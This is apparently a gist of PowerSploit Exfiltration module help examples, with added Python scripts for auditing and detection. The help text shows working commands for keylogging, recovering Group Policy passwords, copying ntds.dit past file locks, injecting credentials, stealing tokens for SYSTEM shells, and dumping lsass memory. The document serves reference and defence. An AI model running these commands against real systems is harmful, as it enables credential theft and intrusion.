PowerSploit Exfiltration Examples Documentation
Gist by carnal0wnage (73ccc44c5b8fc5c53fcb), last active August 16, 2016 10:27
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration

CommandType Name                        ModuleName
----------- ----                        ----------
Function    Get-GPPPassword             Exfiltration
Function    Get-Keystrokes              Exfiltration
Function    Get-TimedScreenshot         Exfiltration
Function    Get-VaultCredential         Exfiltration
Function    Get-VolumeShadowCopy        Exfiltration
Function    Invoke-CredentialInjection  Exfiltration
Function    Invoke-NinjaCopy            Exfiltration
Function    Invoke-TokenManipulation    Exfiltration
Function    Mount-VolumeShadowCopy      Exfiltration
Function    Out-Minidump                Exfiltration

-----
Get-GPPPassword

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-GPPPassword -examples

NAME
Get-GPPPassword

SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.4.2

-------------------------- EXAMPLE 1 --------------------------

PS C:\>Get-GPPPassword

NewName   : [BLANK]
Changed   : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml

NewName   : {mspresenters}
Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

NewName   : [BLANK]
Changed   : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml

NewName   : [BLANK]
Changed   : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml

-------------------------- EXAMPLE 2 --------------------------

PS C:\>Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!

-----
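Every finding above maps to a Group Policy Preferences XML file in SYSVOL that still carries a cpassword attribute; the remediation is to find and remove those entries. The following is an added audit example, not PowerSploit code: it walks constructed Preferences XML (paths modelled on the output above, "{GUID}" and the cpassword values are placeholders) and reports the policy file and account for each stored password without decrypting anything.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample Preferences files; "{GUID}" stands in for a policy GUID and
# "PLACEHOLDER" for the encrypted cpassword value (not real ciphertext).
SAMPLE_FILES: Dict[str, str] = {
    r"\\DEMO.LAB\SYSVOL\demo.lab\Policies\{GUID}\MACHINE\Preferences\Groups\Groups.xml": """
<Groups>
  <User name="Administrator (built-in)" changed="2014-02-21 03:33:07">
    <Properties action="U" newName="mspresenters" userName="Administrator (built-in)" cpassword="PLACEHOLDER"/>
  </User>
  <User name="helpdesk" changed="2014-02-21 03:40:00">
    <Properties action="U" userName="helpdesk" description="no stored password"/>
  </User>
</Groups>""",
    r"\\DEMO.LAB\SYSVOL\demo.lab\Policies\{GUID}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml": """
<ScheduledTasks>
  <Task name="nightly" changed="2014-02-21 05:29:53">
    <Properties action="C" runAs="admin" cpassword="PLACEHOLDER"/>
  </Task>
</ScheduledTasks>""",
    r"\\DEMO.LAB\SYSVOL\demo.lab\Policies\{GUID}\MACHINE\Preferences\Services\Services.xml": """
<NTServices>
  <NTService name="Spooler" changed="2014-02-21 05:30:14">
    <Properties accountName="DEMO\\Administrator" cpassword=""/>
  </NTService>
</NTServices>""",
}

# Account attribute differs per preference type: Groups/Drives use userName,
# DataSources/Printers use username, Services accountName, ScheduledTasks runAs.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpassword_entries(files: Dict[str, str]) -> List[dict]:
    """Return one finding per preference item that still stores a cpassword."""
    findings = []
    for path, xml_text in files.items():
        root = ET.fromstring(xml_text.strip())
        parent_of = {child: parent for parent in root.iter() for child in parent}
        for props in root.iter("Properties"):
            if not props.get("cpassword"):      # absent or empty: nothing stored
                continue
            item = parent_of.get(props)         # the <User>/<Task>/... element
            findings.append({
                "file": path,
                "item": item.tag if item is not None else "?",
                "account": next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "[unknown]"),
                "new_name": props.get("newName") or "[BLANK]",
                "changed": item.get("changed", "?") if item is not None else "?",
            })
    return findings


def report(findings: List[dict]) -> List[str]:
    """One line per finding naming file, item and account, never the secret itself."""
    return [f"{f['item']} '{f['account']}' (newName {f['new_name']}, changed {f['changed']}) in {f['file']}"
            for f in findings]


if __name__ == "__main__":
    for line in report(find_cpassword_entries(SAMPLE_FILES)):
        print("REMOVE:", line)
```

On a real domain, feed it the contents of every *.xml under \\<domain>\SYSVOL\<domain>\Policies\*\{MACHINE,USER}\Preferences.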
Get-Keystrokes

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-Keystrokes -examples

NAME
Get-Keystrokes

SYNOPSIS
Logs keys pressed, time and the active window.

PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Get-Keystrokes -LogPath C:\key.log

-------------------------- EXAMPLE 2 --------------------------

C:\PS>Get-Keystrokes -CollectionInterval 20

-----
Get-TimedScreenshot

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-TimedScreenshot -examples

NAME
Get-TimedScreenshot

SYNOPSIS
Takes screenshots at a regular interval and saves them to disk.

PowerSploit Function: Get-TimedScreenshot
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

-------------------------- EXAMPLE 1 --------------------------

PS C:\>Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00

-----
Get-VaultCredential

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VaultCredential -examples

NAME
Get-VaultCredential

SYNOPSIS
Displays Windows vault credential objects including cleartext web credentials.

PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Get-VaultCredential

-----
Get-VolumeShadowCopy

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VolumeShadowCopy -examples

NAME
Get-VolumeShadowCopy

SYNOPSIS
Lists the device paths of all local volume shadow copies.

PowerSploit Function: Get-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0

-----
Invoke-CredentialInjection

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-CredentialInjection -examples

NAME
Invoke-CredentialInjection

SYNOPSIS
This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).

The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL into winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.

PowerSploit Function: Invoke-CredentialInjection
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.1

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -NewWinLogon

Creates a new winlogon process (as the SYSTEM account) and creates a logon from within the process as demo\administrator. The logon will default to RemoteInteractive (an RDP logon). Defaults to using the Kerberos provider.

-------------------------- EXAMPLE 2 --------------------------

C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -ExistingWinLogon -LogonType NetworkCleartext

Uses an existing winlogon process and creates a logon from within it as demo\administrator. The logon will be type NetworkCleartext (used in basic auth and PowerShell w/ CredSSP). Defaults to using the Kerberos provider.

-------------------------- EXAMPLE 3 --------------------------

C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -NewWinLogon -AuthPackage Msv1_0

Creates a new winlogon process (as the SYSTEM account) and creates a logon from within the process as demo\administrator. The logon will default to RemoteInteractive (an RDP logon). The logon will use the Msv1_0 auth package (NTLM).

-----
Invoke-NinjaCopy

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-NinjaCopy -examples

NAME
Invoke-NinjaCopy

SYNOPSIS
This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires that you are an administrator of the server. This allows you to bypass the following protections:

1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives
2. SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue)
3. Bypass DACLs, such as a DACL which only allows SYSTEM to open a file

If the LocalDestination param is specified, the file will be copied to the file path specified on the local server (the server the script is being run from). If the RemoteDestination param is specified, the file will be copied to the file path specified on the remote server.

The script works by opening a read handle to the volume (which if logged, may stand out, but I don't think most people log this and other processes do it too). The script then uses NTFS parsing code written by cyb70289 and posted to CodePlex to parse the NTFS structures. Since the NTFS parsing code is written in C++, I have compiled the code to a DLL and load it reflectively into PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below for a link to the original script).

Script: Invoke-NinjaCopy.ps1
Author: Joe Bialek, Twitter: @JosephBialek
Contributors: This script has a byte array hardcoded, which contains a DLL which parses NTFS. This NTFS parsing code was written by cyb70289 <cyb70289@gmail.com>. See the following link: http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib. The source code is also available with the distribution of this script.
License: GPLv3 or later
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
ReflectivePEInjection version: 1.1

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Read the file ntds.dit from a remote server and write it to c:\test\ntds.dit on the local server

$NtdsBytes = Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "Server1" -LocalDestination "c:\test\ntds.dit"

-------------------------- EXAMPLE 2 --------------------------

C:\PS>Read the file ntds.dit from a remote server and copy it to the temp directory on the remote server.

Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -RemoteDestination "c:\windows\temp\ntds.dit" -ComputerName "Server1"

-------------------------- EXAMPLE 3 --------------------------

C:\PS>Read the file ntds.dit from the local server and copy it to the temp directory on the local server.

Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"

-----
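Because the file itself is never opened through the Win32 API, file-level SACL auditing will not fire; the signal the synopsis itself points at is the read handle on the volume, which Sysmon records as Event ID 9 (RawAccessRead) with the Image and Device fields. The following is an added detection example, not PowerSploit code: it reads constructed Event ID 9 records (host names, paths, PIDs and the backup-agent allowlist are made up), drops images baselined as legitimate raw readers, and rates script hosts such as powershell.exe highest.

```python
import json
from typing import Dict, List

# Constructed Sysmon Event ID 9 (RawAccessRead) records as JSON lines. Field names
# follow Sysmon's schema; hosts, PIDs, times and image paths are made up.
SAMPLE_EVENTS = r"""
{"EventID": 9, "UtcTime": "2016-08-16 10:01:12", "Computer": "DC01", "ProcessId": 1208, "Image": "C:\\Program Files\\ExampleBackup\\agent.exe", "Device": "\\Device\\HarddiskVolume2"}
{"EventID": 9, "UtcTime": "2016-08-16 10:03:45", "Computer": "DC01", "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Device": "\\Device\\HarddiskVolume2"}
{"EventID": 9, "UtcTime": "2016-08-16 10:05:02", "Computer": "FS01", "ProcessId": 2760, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\tool.exe", "Device": "\\Device\\HarddiskVolume3"}
{"EventID": 1, "UtcTime": "2016-08-16 10:05:03", "Computer": "FS01", "ProcessId": 2761, "Image": "C:\\Windows\\System32\\cmd.exe"}
"""

# Hypothetical baseline of images that legitimately read volumes raw on these hosts
# (backup/imaging agents); build it from your own environment's history.
ALLOWLIST = {r"c:\program files\examplebackup\agent.exe"}
# Script hosts have no business opening a raw volume handle: rate them higher.
SCRIPT_HOSTS = {"powershell.exe", "powershell_ise.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_events(text: str) -> List[Dict]:
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def raw_read_alerts(events: List[Dict]) -> List[Dict]:
    """One alert per RawAccessRead whose image is not in the baseline."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 9:
            continue
        image = ev.get("Image", "").lower()
        if image in ALLOWLIST:
            continue
        exe = image.rsplit("\\", 1)[-1]
        alerts.append({
            "host": ev["Computer"], "time": ev["UtcTime"], "pid": ev["ProcessId"],
            "image": ev["Image"], "device": ev["Device"],
            "severity": "high" if exe in SCRIPT_HOSTS else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in raw_read_alerts(parse_events(SAMPLE_EVENTS)):
        print(f"[{a['severity']}] {a['time']} {a['host']} pid {a['pid']} {a['image']} read {a['device']}")
```

A raw read of a domain controller's system volume by anything other than the backup baseline is the case to page on, since that volume holds NTDS.dit and the SYSTEM hive.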
Invoke-TokenManipulation

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-TokenManipulation -examples

NAME
Invoke-TokenManipulation

SYNOPSIS
This script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use another user's credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections. This functionality is very similar to the incognito tool (with some differences, and different use goals).

This script can also make the PowerShell thread impersonate another user's Logon Token. Unfortunately this doesn't work well, because PowerShell creates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token that one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect to another server as that user (it will authenticate using the primary token of the process, which is your original logon token).

Because of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another user's Logon Token, and then use this process to pivot. This works because the entire process is created using the other user's Logon Token, so it will use their credentials for the authentication.

IMPORTANT: If you are creating a process, by default this script will modify the ACL of the current user's desktop to allow full control to "Everyone". This is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL is not permanent, as in, when the current user logs off the ACL is cleared. It is still preferable to not modify things unless they need to be modified though, so I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop. This could show up in logs depending on the level of monitoring.

PERMISSIONS REQUIRED:
SeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this.
SeAssignPrimaryTokenPrivilege: Needed if launching a process while the script is running in Session 0.

Important differences from incognito:
First of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates between "Impersonation" and "Delegation" tokens. This is because incognito can be used in situations where you get remote code execution against a service which has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow you to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting without dumping credentials.

In this situation, Impersonation vs Delegation does not matter because an administrator can turn any token into a primary token (delegation rights). What does matter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for the user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types should have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks for tokens which were created with desirable logon tokens (and only displays them by default).

In a nutshell, instead of worrying about "delegation vs impersonation" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good).

PowerSploit Function: Invoke-TokenManipulation
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.11
(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe)

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Invoke-TokenManipulation -Enumerate

Lists all unique usable tokens on the computer.

-------------------------- EXAMPLE 2 --------------------------

C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"

Spawns cmd.exe as SYSTEM.

-------------------------- EXAMPLE 3 --------------------------

C:\PS>Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system"

Makes the current PowerShell thread impersonate SYSTEM.

-------------------------- EXAMPLE 4 --------------------------

C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500

Spawns cmd.exe using the primary token belonging to process ID 500.

-------------------------- EXAMPLE 5 --------------------------

C:\PS>Invoke-TokenManipulation -ShowAll

Lists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon.

-------------------------- EXAMPLE 6 --------------------------

C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500

Spawns cmd.exe using the token belonging to thread ID 500.

-------------------------- EXAMPLE 7 --------------------------

C:\PS>Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the "-Process" parameter of the script.

-------------------------- EXAMPLE 8 --------------------------

C:\PS>(Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit()

Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited.

-------------------------- EXAMPLE 9 --------------------------

C:\PS>Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser

Makes the current thread impersonate the lsass security token.

-----
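The reasoning in the two synopses above (Invoke-CredentialInjection's RemoteInteractive and NetworkCleartext logons, and Invoke-TokenManipulation's "NetworkLogon (bad) vs Non-NetworkLogon (good)") is, read from the defender's side, an inventory question: which accounts hold credential-bearing logon sessions on which hosts, where a local administrator could reuse them. The following is an added example, not PowerSploit code: it applies exactly that rule to constructed Security 4624 records (hosts, accounts and the privileged-account list are made up), treating only logon type 3 as credential-free, as the script does.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Windows 4624 logon type codes. Invoke-TokenManipulation only distinguishes
# Network (3) from everything else, and so does this classifier.
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
               11: "CachedInteractive"}

# Constructed 4624 records reduced to the fields used here; hosts and accounts are made up.
SAMPLE_4624 = [
    {"Computer": "WS01", "TargetDomainName": "DEMO", "TargetUserName": "administrator", "LogonType": 10},
    {"Computer": "WS01", "TargetDomainName": "DEMO", "TargetUserName": "administrator", "LogonType": 3},
    {"Computer": "FS01", "TargetDomainName": "DEMO", "TargetUserName": "svc_backup", "LogonType": 5},
    {"Computer": "WS02", "TargetDomainName": "DEMO", "TargetUserName": "jsmith", "LogonType": 2},
    {"Computer": "WS02", "TargetDomainName": "DEMO", "TargetUserName": "administrator", "LogonType": 3},
    {"Computer": "WS02", "TargetDomainName": "WS02", "TargetUserName": "WS02$", "LogonType": 5},
]
# Constructed: accounts that must never leave a reusable token on a member host.
PRIVILEGED = {"demo\\administrator"}


def leaves_credentials(logon_type: int) -> bool:
    """Type 3 (Network) logons hold no credentials on the target; all other types do."""
    return logon_type != 3


def account_of(ev: Dict) -> str:
    return f"{ev['TargetDomainName']}\\{ev['TargetUserName']}".lower()


def exposure_by_host(events: List[Dict]) -> Dict[str, Set[str]]:
    """Map each host to the user accounts with credential-bearing sessions on it."""
    exposed = defaultdict(set)
    for ev in events:
        account = account_of(ev)
        if account.endswith("$"):               # machine accounts are not the concern here
            continue
        if leaves_credentials(int(ev["LogonType"])):
            exposed[ev["Computer"]].add(account)
    return dict(exposed)


def privileged_exposure(events: List[Dict], privileged: Set[str]) -> List[Tuple[str, str, str]]:
    """(host, account, logon type name) for every privileged logon that leaves credentials."""
    hits = []
    for ev in events:
        account, lt = account_of(ev), int(ev["LogonType"])
        if account in privileged and leaves_credentials(lt):
            hits.append((ev["Computer"], account, LOGON_TYPES.get(lt, f"type {lt}")))
    return hits


if __name__ == "__main__":
    for host, accounts in sorted(exposure_by_host(SAMPLE_4624).items()):
        print(host, sorted(accounts))
    for host, account, kind in privileged_exposure(SAMPLE_4624, PRIVILEGED):
        print(f"PRIVILEGED EXPOSURE: {account} on {host} via {kind} logon")
```

The type 3 logons of demo\administrator on WS01 and WS02 are deliberately not reported; by the synopsis's own logic they leave nothing on those hosts to reuse.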
Mount-VolumeShadowCopy

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Mount-VolumeShadowCopy -examples

NAME
Mount-VolumeShadowCopy

SYNOPSIS
Mounts a volume shadow copy.

PowerSploit Function: Mount-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS

Description
-----------
Create a mount point in 'C:\VSS' for each volume shadow copy volume

-------------------------- EXAMPLE 2 --------------------------

C:\PS>Mount-VolumeShadowCopy -Path C:\VSS -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'

-------------------------- EXAMPLE 3 --------------------------

C:\PS>Get-WmiObject Win32_ShadowCopy | % { Mount-VolumeShadowCopy -Path C:\VSS -DevicePath $_.DeviceObject }

-----
Out-Minidump

PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Out-Minidump -examples

NAME
Out-Minidump

SYNOPSIS
Generates a full-memory minidump of a process.

PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

-------------------------- EXAMPLE 1 --------------------------

C:\PS>Out-Minidump -Process (Get-Process -Id 4293)

Description
-----------
Generate a minidump for process ID 4293.

-------------------------- EXAMPLE 2 --------------------------

C:\PS>Get-Process lsass | Out-Minidump

Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be running from an elevated prompt.

-------------------------- EXAMPLE 3 --------------------------

C:\PS>Get-Process | Out-Minidump -DumpFilePath C:\temp

Description
-----------
Generate a minidump of all running processes and save them to C:\temp.